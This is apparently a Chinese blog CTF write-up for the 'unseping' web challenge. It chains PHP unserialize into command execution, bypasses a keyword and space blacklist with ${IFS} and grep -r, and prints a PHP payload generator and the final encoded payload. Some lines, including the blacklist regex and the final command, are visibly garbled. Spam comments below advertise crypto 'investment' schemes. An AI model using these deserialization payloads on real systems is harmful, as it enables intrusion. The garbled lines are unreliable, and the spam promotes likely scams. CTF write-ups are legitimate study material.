unseping

booksy_blog
WEB WEB

PHP 反序列化到 RCE:极简攻击链路

只保留核心思路与最终 payload

1. 链路与过滤

  • 入口:unserialize(base64_decode($_POST['ctf']))
  • 魔术方法:
    __wakeup()__destruct()ping()exec($ip,$result)

  • 黑名单正则

    /(||&|;| |/|cat|flag|tac|php|ls)/

2. 攻击步骤

  1. 目录确认
    fl*_here 是目录,内部存在文件。

  2. 黑名单绕过

    • 空格 → ${IFS}
    • cat/flag/ls → 使用 grep -r . 递归输出目录内容
  3. 最终命令
    grep{IFS}−r{IFS}.{IFS}fl*_here

3. 一键利用脚本

<?php
class ease {
 private $method = "ping";
 private $args   = ["grep\${IFS}-r\${IFS}.\${IFS}fl*_here"];
}
echo urlencode(base64_encode(serialize(new ease())));
?>

输出 payload(直接 POST)
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMzoiZ3JlcCR7SUZTfS1yJHtJRlN9LiR7SUZTfWZsKl9oZXJlIjt9fQ%3D%3D

  1. 结果
    回显
    image.png

添加新评论

取消回复

已有 4 条评论

  1. trzpoaarai

    trzpoaarai

    回复

    新车首发,新的一年,只带想赚米的人

  2. xmzoojgnic

    xmzoojgnic

    回复

    新车新盘 嘎嘎稳 嘎嘎靠谱

  3. puhysldbaw

    puhysldbaw

    回复

    2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
    新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
    新车首发,新的一年,只带想赚米的人coinsrore.com
    新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
    做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
    新车上路,只带前10个人coinsrore.com
    新盘首开 新盘首开 征召客户!!!coinsrore.com
    新项目准备上线,寻找志同道合 的合作伙伴coinsrore.com
    新车即将上线 真正的项目,期待你的参与coinsrore.com
    新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
    新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com

  4. ccakntfrlr

    ccakntfrlr

    回复

    2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
    新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
    新车首发,新的一年,只带想赚米的人coinsrore.com
    新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
    做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
    新车上路,只带前10个人coinsrore.com
    新盘首开 新盘首开 征召客户!!!coinsrore.com
    新项目准备上线,寻找志同道合 的合作伙伴coinsrore.com
    新车即将上线 真正的项目,期待你的参与coinsrore.com
    新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
    新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com